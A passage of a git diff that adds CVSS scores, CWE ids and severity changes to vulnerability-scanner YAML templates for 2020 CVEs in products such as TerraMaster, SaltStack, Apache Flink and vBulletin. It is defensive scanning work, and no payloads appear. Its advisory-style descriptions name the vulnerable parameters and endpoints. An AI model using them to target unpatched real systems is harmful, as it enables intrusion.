https://nvd.nist.gov/vuln/detail/CVE-2020-15500 - https://github.com/maptiler/tileserver-gl/issues/461 tags: cve,cve2020,xss,tileserver + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-15500 + cwe-id: CWE-79 + description: "An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS." requests: - method: GET diff --git a/cves/2020/CVE-2020-15505.yaml b/cves/2020/CVE-2020-15505.yaml index 15ac2adc6c..1877acd2d4 100644 --- a/cves/2020/CVE-2020-15505.yaml +++ b/cves/2020/CVE-2020-15505.yaml @@ -16,6 +16,10 @@ info: - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10 - https://github.com/orangetw/JNDI-Injection-Bypass tags: cve,cve2020,mobileiron,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15505 requests: - raw: diff --git a/cves/2020/CVE-2020-15568.yaml b/cves/2020/CVE-2020-15568.yaml index 4a4140cb1c..7ae06a5513 100644 --- a/cves/2020/CVE-2020-15568.yaml +++ b/cves/2020/CVE-2020-15568.yaml @@ -7,6 +7,11 @@ info: description: TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. reference: https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ tags: cve,cve2020,terramaster,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15568 + cwe-id: CWE-913 requests: - raw: diff --git a/cves/2020/CVE-2020-15920.yaml b/cves/2020/CVE-2020-15920.yaml index e0457058b0..983229407e 100644 --- a/cves/2020/CVE-2020-15920.yaml +++ b/cves/2020/CVE-2020-15920.yaml @@ -7,6 +7,11 @@ info: description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required. reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html tags: cve,cve2020,mida,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15920 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-16139.yaml b/cves/2020/CVE-2020-16139.yaml index 12f3ac20ab..d94b86da6f 100644 --- a/cves/2020/CVE-2020-16139.yaml +++ b/cves/2020/CVE-2020-16139.yaml @@ -3,11 +3,15 @@ id: CVE-2020-16139 info: name: Cisco 7937G Denial-of-Service Reboot Attack author: pikpikcu - severity: low + severity: high description: | A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. reference: https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/ tags: cve,cve2020,dos,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2020-16139 requests: - raw: diff --git a/cves/2020/CVE-2020-16846.yaml b/cves/2020/CVE-2020-16846.yaml index 9cf24f5d88..372a0572b7 100644 --- a/cves/2020/CVE-2020-16846.yaml +++ b/cves/2020/CVE-2020-16846.yaml @@ -13,6 +13,11 @@ info: - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag - https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846 tags: cve,cve2020,saltstack + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-16846 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-16952.yaml b/cves/2020/CVE-2020-16952.yaml index 495e9c38e7..f126ba25cf 100644 --- a/cves/2020/CVE-2020-16952.yaml +++ b/cves/2020/CVE-2020-16952.yaml @@ -3,13 +3,18 @@ id: CVE-2020-16952 info: name: Microsoft SharePoint Server-Side Include (SSI) and ViewState RCE author: dwisiswant0 - severity: critical + severity: high description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951. reference: - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952 - https://srcincite.io/pocs/cve-2020-16952.py.txt - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md tags: cve,cve2020,sharepoint,iis + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2020-16952 + cwe-id: CWE-346 requests: - method: GET diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml index f448fae016..dc16edbe43 100644 --- a/cves/2020/CVE-2020-17362.yaml +++ b/cves/2020/CVE-2020-17362.yaml @@ -7,6 +7,11 @@ info: description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS. reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 tags: cve,cve2020,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-17362 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml index 17c80dd210..323ddb2eba 100644 --- a/cves/2020/CVE-2020-17453.yaml +++ b/cves/2020/CVE-2020-17453.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. tags: xss,wso2,cve2020,cve reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-17453 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index bbcd6072f2..d6a5b88323 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -7,6 +7,11 @@ info: description: | vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. tags: cve,cve2020,vbulletin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-17496 + cwe-id: CWE-74 requests: - raw: diff --git a/cves/2020/CVE-2020-17505.yaml b/cves/2020/CVE-2020-17505.yaml index c98ea1fe16..6e0d00f86d 100644 --- a/cves/2020/CVE-2020-17505.yaml +++ b/cves/2020/CVE-2020-17505.yaml @@ -7,6 +7,11 @@ info: description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. tags: cve,cve2020,rce reference: https://blog.max0x4141.com/post/artica_proxy/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-17505 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-17506.yaml b/cves/2020/CVE-2020-17506.yaml index f22e184fd5..bc3ee60d1e 100644 --- a/cves/2020/CVE-2020-17506.yaml +++ b/cves/2020/CVE-2020-17506.yaml @@ -7,6 +7,11 @@ info: description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php. tags: cve,cve2020 reference: https://blog.max0x4141.com/post/artica_proxy/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-17506 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml index 8e59416072..86ff4d8977 100644 --- a/cves/2020/CVE-2020-17518.yaml +++ b/cves/2020/CVE-2020-17518.yaml @@ -3,12 +3,17 @@ id: CVE-2020-17518 info: name: Apache Flink Upload Path Traversal author: pdteam - severity: critical + severity: high reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518 description: | Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP HEADER. tags: cve,cve2020,apache,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2020-17518 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2020/CVE-2020-17519.yaml b/cves/2020/CVE-2020-17519.yaml index f1c9a162b0..5e386eed1f 100644 --- a/cves/2020/CVE-2020-17519.yaml +++ b/cves/2020/CVE-2020-17519.yaml @@ -7,6 +7,11 @@ info: description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. reference: https://github.com/B1anda0/CVE-2020-17519 tags: cve,cve2020,apache,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-17519 + cwe-id: CWE-552 requests: - method: GET diff --git a/cves/2020/CVE-2020-17530.yaml b/cves/2020/CVE-2020-17530.yaml index fbae086491..3e281da466 100644 --- a/cves/2020/CVE-2020-17530.yaml +++ b/cves/2020/CVE-2020-17530.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2020,apache,rce,struts description: | Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-17530 + cwe-id: CWE-917 requests: - method: GET diff --git a/cves/2020/CVE-2020-1938.yaml b/cves/2020/CVE-2020-1938.yaml index 14c505aa53..e142920541 100644 --- a/cves/2020/CVE-2020-1938.yaml +++ b/cves/2020/CVE-2020-1938.yaml @@ -3,9 +3,15 @@ id: CVE-2020-1938 info: name: Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability author: milo2012 - severity: high + severity: critical reference: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 tags: cve,cve2020,apache,tomcat,lfi,network + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-1938 + cwe-id: CWE-269 + description: "When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations." network: - inputs: diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml index 021fb3e887..acc8e77e77 100644 --- a/cves/2020/CVE-2020-1943.yaml +++ b/cves/2020/CVE-2020-1943.yaml @@ -8,6 +8,11 @@ info: tags: cve,cve2020,apache,xss reference: - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-1943 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-19625.yaml b/cves/2020/CVE-2020-19625.yaml index 2a6dce0689..ba85b67fc6 100644 --- a/cves/2020/CVE-2020-19625.yaml +++ b/cves/2020/CVE-2020-19625.yaml @@ -4,8 +4,12 @@ info: author: geeknik description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter. reference: https://github.com/oria/gridx/issues/433 - severity: high + severity: critical tags: cve,cve2020,gridx,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-19625 requests: - method: GET diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml index 707e6c5343..aaf9f7972d 100644 --- a/cves/2020/CVE-2020-2036.yaml +++ b/cves/2020/CVE-2020-2036.yaml @@ -2,11 +2,16 @@ id: CVE-2020-2036 info: name: Palo Alto Networks Reflected XSS author: madrobot - severity: medium + severity: high description: > A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ tags: cve,cve2020,vpn,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-2036 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml index 7a5e9b010c..b6c161b850 100644 --- a/cves/2020/CVE-2020-2096.yaml +++ b/cves/2020/CVE-2020-2096.yaml @@ -10,6 +10,11 @@ info: - http://www.openwall.com/lists/oss-security/2020/01/15/1 - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html tags: cve,cve2020,jenkins,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-2096 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml index e85004b3b3..4b25b87e1f 100644 --- a/cves/2020/CVE-2020-21224.yaml +++ b/cves/2020/CVE-2020-21224.yaml @@ -7,6 +7,11 @@ info: description: A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul tags: cve,cve2020,clusterengine,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-21224 + cwe-id: CWE-88 requests: - method: POST diff --git a/cves/2020/CVE-2020-2140.yaml b/cves/2020/CVE-2020-2140.yaml index 69eb751280..54be67bdf5 100644 --- a/cves/2020/CVE-2020-2140.yaml +++ b/cves/2020/CVE-2020-2140.yaml @@ -6,6 +6,11 @@ info: description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. reference: https://www.jenkins.io/security/advisory/2020-03-09/ tags: cve,cve2020,jenkins,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-2140 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-22840.yaml b/cves/2020/CVE-2020-22840.yaml index 69ef50972f..24f34dd46a 100644 --- a/cves/2020/CVE-2020-22840.yaml +++ b/cves/2020/CVE-2020-22840.yaml @@ -3,9 +3,18 @@ id: CVE-2020-22840 info: name: b2evolution CMS Open redirect author: geeknik - severity: low + severity: medium description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php. tags: cve,cve2020,redirect,b2evolution + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-22840 + cwe-id: CWE-601 + reference: + - https://github.com/b2evolution/b2evolution/issues/102 + - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html + - https://www.exploit-db.com/exploits/49554 requests: - method: GET diff --git a/cves/2020/CVE-2020-23517.yaml b/cves/2020/CVE-2020-23517.yaml index 7430e804ef..ddd98b74b9 100644 --- a/cves/2020/CVE-2020-23517.yaml +++ b/cves/2020/CVE-2020-23517.yaml @@ -7,6 +7,11 @@ info: description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html tags: xss,cve,cve2020 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-23517 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-23972.yaml b/cves/2020/CVE-2020-23972.yaml index 5270160681..af1319821d 100644 --- a/cves/2020/CVE-2020-23972.yaml +++ b/cves/2020/CVE-2020-23972.yaml @@ -11,6 +11,11 @@ info: bypassed by changing Content-Type & name file too double ext. reference: https://www.exploit-db.com/exploits/49129 tags: cve,cve2020,joomla + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2020-23972 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-24148.yaml b/cves/2020/CVE-2020-24148.yaml index 6723ab0df4..7b3b0a8eb0 100644 --- a/cves/2020/CVE-2020-24148.yaml +++ b/cves/2020/CVE-2020-24148.yaml @@ -9,6 +9,11 @@ info: description: | Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H + cvss-score: 9.10 + cve-id: CVE-2020-24148 + cwe-id: CWE-918 requests: - method: POST diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index 13d8570a5b..20c73cd80d 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml @@ -7,6 +7,11 @@ info: description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md tags: cve,cve2020,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-24186 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-24223.yaml b/cves/2020/CVE-2020-24223.yaml index e5674758dd..6c887b906a 100644 --- a/cves/2020/CVE-2020-24223.yaml +++ b/cves/2020/CVE-2020-24223.yaml @@ -10,6 +10,11 @@ info: - https://sourceforge.net/projects/maracms/ # vendor homepage - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # software link tags: cve,cve2020,mara,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24223 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-24312.yaml b/cves/2020/CVE-2020-24312.yaml index ce90bb4046..8bd38792df 100644 --- a/cves/2020/CVE-2020-24312.yaml +++ b/cves/2020/CVE-2020-24312.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2020,wordpress,backups # Note: Manually check content + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-24312 + cwe-id: CWE-552 requests: - method: GET diff --git a/cves/2020/CVE-2020-24550.yaml b/cves/2020/CVE-2020-24550.yaml index c85f31a04e..7634783769 100644 --- a/cves/2020/CVE-2020-24550.yaml +++ b/cves/2020/CVE-2020-24550.yaml @@ -7,6 +7,11 @@ info: description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. tags: cve,cve2020,redirect,episerver reference: https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24550 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2020/CVE-2020-24571.yaml b/cves/2020/CVE-2020-24571.yaml index 3e8f391472..7ac3c519d7 100644 --- a/cves/2020/CVE-2020-24571.yaml +++ b/cves/2020/CVE-2020-24571.yaml @@ -6,6 +6,11 @@ info: description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal. reference: https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 tags: cve,cve2020,nexusdb,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-24571 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-24579.yaml b/cves/2020/CVE-2020-24579.yaml index 24b6fd03d9..b998f77f13 100644 --- a/cves/2020/CVE-2020-24579.yaml +++ b/cves/2020/CVE-2020-24579.yaml @@ -3,10 +3,15 @@ id: CVE-2020-24579 info: name: DLINK DSL 2888a RCE author: pikpikcu - severity: medium + severity: high description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ tags: cve,cve2020,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-24579 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2020/CVE-2020-24949.yaml b/cves/2020/CVE-2020-24949.yaml index 9b973fef67..58d1536129 100644 --- a/cves/2020/CVE-2020-24949.yaml +++ b/cves/2020/CVE-2020-24949.yaml @@ -7,6 +7,10 @@ info: description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE). reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt tags: cve,cve2020,phpfusion,rce,php + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-24949 requests: - method: GET diff --git a/cves/2020/CVE-2020-25078.yaml b/cves/2020/CVE-2020-25078.yaml index 1789b5371c..7f8a7cfa59 100644 --- a/cves/2020/CVE-2020-25078.yaml +++ b/cves/2020/CVE-2020-25078.yaml @@ -7,6 +7,10 @@ info: description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078 tags: cve,cve2020,dlink + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-25078 requests: diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index f2553035ef..67e680d764 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -12,6 +12,11 @@ info: # Uploaded file will be accessible at:- # http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25213 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml index 21cf8027b4..adcb65ac0a 100644 --- a/cves/2020/CVE-2020-25223.yaml +++ b/cves/2020/CVE-2020-25223.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 tags: cve,cve2020,sophos,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25223 requests: - raw: diff --git a/cves/2020/CVE-2020-25495.yaml b/cves/2020/CVE-2020-25495.yaml index a60c97dbea..5a82ebb9c1 100644 --- a/cves/2020/CVE-2020-25495.yaml +++ b/cves/2020/CVE-2020-25495.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: cve,cve2020,sco,xss reference: https://www.exploit-db.com/exploits/49300 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-25495 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index d2352c64ac..2ee12a9f60 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -9,6 +9,11 @@ info: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ tags: cve,cve2020,dlink,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25506 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-2551.yaml b/cves/2020/CVE-2020-2551.yaml index c861f6b44a..348fd0ba52 100644 --- a/cves/2020/CVE-2020-2551.yaml +++ b/cves/2020/CVE-2020-2551.yaml @@ -19,6 +19,10 @@ info: reference: https://github.com/hktalent/CVE-2020-2551 tags: cve,cve2020,oracle,weblogic,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-2551 requests: - method: GET diff --git a/cves/2020/CVE-2020-25540.yaml b/cves/2020/CVE-2020-25540.yaml index 822c9f5ef4..2ff12bd0ef 100644 --- a/cves/2020/CVE-2020-25540.yaml +++ b/cves/2020/CVE-2020-25540.yaml @@ -3,10 +3,15 @@ info: name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540) author: geeknik - severity: medium + severity: high description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. reference: https://www.exploit-db.com/exploits/48812 tags: cve,cve2020,thinkadmin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-25540 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-26153.yaml b/cves/2020/CVE-2020-26153.yaml index fb40209d26..7a0433f16c 100644 --- a/cves/2020/CVE-2020-26153.yaml +++ b/cves/2020/CVE-2020-26153.yaml @@ -10,6 +10,11 @@ info: - 